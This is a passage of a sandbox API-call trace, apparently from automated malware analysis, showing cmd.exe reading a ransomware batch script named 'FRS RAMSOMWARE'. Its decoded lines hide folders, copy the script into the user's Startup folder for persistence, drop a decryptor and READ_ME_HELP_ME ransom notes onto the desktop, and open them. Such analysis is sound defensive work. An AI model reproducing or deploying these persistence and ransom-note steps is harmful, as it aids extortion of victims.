everyone\r\n") returned 21 [0094.164] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0094.164] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.164] GetFileType (hFile=0x158) returned 0x1 [0094.164] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x53e [0094.164] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.164] SetFilePointer (in: hFile=0x158, lDistanceToMove=1379, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0094.164] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRSRAMSOMWARE\r\n\n") returned 37 [0094.164] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0094.164] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.164] GetFileType (hFile=0x158) returned 0x1 [0094.164] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x563 [0094.165] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.165] SetFilePointer (in: hFile=0x158, lDistanceToMove=1395, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0094.165] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=16, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="md C:\\FRS_TEMP\r\n+r C:\\FRSRAMSOMWARE\r\n") returned 16 [0094.165] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0094.165] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.165] GetFileType (hFile=0x158) returned 0x1 [0094.165] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x573 [0094.165] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.165] SetFilePointer (in: hFile=0x158, lDistanceToMove=1427, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0094.165] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=32, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="attrib +s +a +h +r C:\\FRS_TEMP\r\nARE\r\n") returned 32 [0094.165] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0094.165] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.165] GetFileType (hFile=0x158) returned 0x1 [0094.165] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x593 [0094.165] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.165] SetFilePointer (in: hFile=0x158, lDistanceToMove=1462, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0094.165] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="echo.encrypt>C:\\FRS_TEMP\\temp.txt\r\n\r\n") returned 35 [0094.165] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0094.165] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.165] GetFileType (hFile=0x158) returned 0x1 [0094.165] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x5b6 [0094.165] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.165] SetFilePointer (in: hFile=0x158, lDistanceToMove=1542, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0094.165] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=80, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\Users\\%username%\\Desktop\\FRS_Decryptor.exe\r\npng\r\n") returned 80 [0094.165] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0094.165] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.165] GetFileType (hFile=0x158) returned 0x1 [0094.165] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x606 [0094.165] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.165] SetFilePointer (in: hFile=0x158, lDistanceToMove=1626, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0094.166] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.png\r\n\n") returned 84 [0094.166] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0094.166] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.166] GetFileType (hFile=0x158) returned 0x1 [0094.166] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x65a [0094.166] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.166] SetFilePointer (in: hFile=0x158, lDistanceToMove=1710, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0094.166] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=84, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\Users\\%username%\\Desktop\\READ_ME_HELP_ME.txt\r\n") returned 84 [0094.166] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0094.166] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.166] GetFileType (hFile=0x158) returned 0x1 [0094.166] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x6ae [0094.166] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.166] SetFilePointer (in: hFile=0x158, lDistanceToMove=1806, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0094.166] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=96, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n\n") returned 96 [0094.166] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0094.166] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.166] GetFileType (hFile=0x158) returned 0x1 [0094.166] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x70e [0094.166] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.166] SetFilePointer (in: hFile=0x158, lDistanceToMove=1840, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0094.166] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=34, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 C:\\FRSRAMSOMWARE\\FRS.exe\r\nag.png C:\\Users\\%username%\\Desktop\\Chinese_national_flag.png\r\n") returned 34 [0094.166] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0094.166] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.166] GetFileType (hFile=0x158) returned 0x1 [0094.166] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x730 [0094.166] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.166] SetFilePointer (in: hFile=0x158, lDistanceToMove=1937, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0094.166] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=97, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %0 \"C:\\Users\\FIFCOM\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\FRS.exe\"\r\n") returned 97 [0094.166] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0094.167] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.167] GetFileType (hFile=0x158) returned 0x1 [0094.167] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x791 [0094.167] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.167] SetFilePointer (in: hFile=0x158, lDistanceToMove=2006, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0094.167] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=69, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\FRS_Decryptor.exe C:\\FRSRAMSOMWARE\\FRS_Decryptor.exe\r\n\\Programs\\Startup\\FRS.exe\"\r\n") returned 69 [0094.167] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0094.167] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.167] GetFileType (hFile=0x158) returned 0x1 [0094.167] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x7d6 [0094.167] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.167] SetFilePointer (in: hFile=0x158, lDistanceToMove=2079, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0094.167] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.png C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.png\r\ngrams\\Startup\\FRS.exe\"\r\n") returned 73 [0094.167] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0094.167] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.167] GetFileType (hFile=0x158) returned 0x1 [0094.167] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x81f [0094.167] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.167] SetFilePointer (in: hFile=0x158, lDistanceToMove=2152, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0094.167] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=73, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\READ_ME_HELP_ME.txt C:\\FRSRAMSOMWARE\\READ_ME_HELP_ME.txt\r\n") returned 73 [0094.167] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0094.167] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.167] GetFileType (hFile=0x158) returned 0x1 [0094.167] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x868 [0094.167] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x200, lpOverlapped=0x0) returned 1 [0094.167] SetFilePointer (in: hFile=0x158, lDistanceToMove=2237, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0094.167] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=85, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="copy %MYFILES%\\Chinese_national_flag.png C:\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\np\\FRS.exe\"\r\n") returned 85 [0094.167] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0094.167] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.167] GetFileType (hFile=0x158) returned 0x1 [0094.168] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8bd [0094.168] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x1b1, lpOverlapped=0x0) returned 1 [0094.168] SetFilePointer (in: hFile=0x158, lDistanceToMove=2280, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0094.168] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=43, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\Chinese_national_flag.png\r\n\\FRSRAMSOMWARE\\Chinese_national_flag.png\r\n") returned 43 [0094.168] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0094.168] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.168] GetFileType (hFile=0x158) returned 0x1 [0094.168] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8e8 [0094.168] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x186, lpOverlapped=0x0) returned 1 [0094.168] SetFilePointer (in: hFile=0x158, lDistanceToMove=2302, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0094.168] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\ne_national_flag.png\r\n") returned 22 [0094.168] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0094.168] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.168] GetFileType (hFile=0x158) returned 0x1 [0094.168] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x8fe [0094.168] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x170, lpOverlapped=0x0) returned 1 [0094.168] SetFilePointer (in: hFile=0x158, lDistanceToMove=2339, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0094.168] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.txt\r\n.png\r\n") returned 37 [0094.168] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0094.168] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.168] GetFileType (hFile=0x158) returned 0x1 [0094.168] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x923 [0094.168] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x14b, lpOverlapped=0x0) returned 1 [0094.168] SetFilePointer (in: hFile=0x158, lDistanceToMove=2361, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0094.168] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.txt\r\n") returned 22 [0094.168] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0094.168] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.168] GetFileType (hFile=0x158) returned 0x1 [0094.168] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x939 [0094.168] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x135, lpOverlapped=0x0) returned 1 [0094.169] SetFilePointer (in: hFile=0x158, lDistanceToMove=2383, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0094.169] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="taskkill notepad.exe\r\n") returned 22 [0094.169] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0094.169] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.169] GetFileType (hFile=0x158) returned 0x1 [0094.169] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94f [0094.169] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0x11f, lpOverlapped=0x0) returned 1 [0094.169] SetFilePointer (in: hFile=0x158, lDistanceToMove=2420, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0094.169] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=37, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\READ_ME_HELP_ME.png\r\n") returned 37 [0094.169] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0094.169] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.169] GetFileType (hFile=0x158) returned 0x1 [0094.169] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x974 [0094.169] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xfa, lpOverlapped=0x0) returned 1 [0094.169] SetFilePointer (in: hFile=0x158, lDistanceToMove=2442, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0094.169] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=22, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="ping -n 10 127.1>nul\r\nE_HELP_ME.png\r\n") returned 22 [0094.169] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0094.169] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.169] GetFileType (hFile=0x158) returned 0x1 [0094.169] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x98a [0094.169] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xe4, lpOverlapped=0x0) returned 1 [0094.169] SetFilePointer (in: hFile=0x158, lDistanceToMove=2477, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0094.169] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=35, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="start %MYFILES%\\FRS_Decryptor.exe\r\n\r\n") returned 35 [0094.169] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0094.169] _get_osfhandle (_FileHandle=3) returned 0x158 [0094.169] GetFileType (hFile=0x158) returned 0x1 [0094.169] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x9ad [0094.169] ReadFile (in: hFile=0x158, lpBuffer=0x12b6840, nNumberOfBytesToRead=0x200, lpNumberOfBytesRead=0xc8e96c, lpOverlapped=0x0 | out: lpBuffer=0x12b6840*, lpNumberOfBytesRead=0xc8e96c*=0xc1, lpOverlapped=0x0) returned 1 [0094.169] SetFilePointer (in: hFile=0x158, lDistanceToMove=2485, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x9b5 [0094.169] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x12b6840, cbMultiByte=8, lpWideCharStr=0x12c4840, cchWideChar=512 | out: lpWideCharStr="goto 4\r\nYFILES%\\FRS_Decryptor.exe\r\n") returned 8 [0094.170] SetFilePointer (in: hFile=0x158, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: 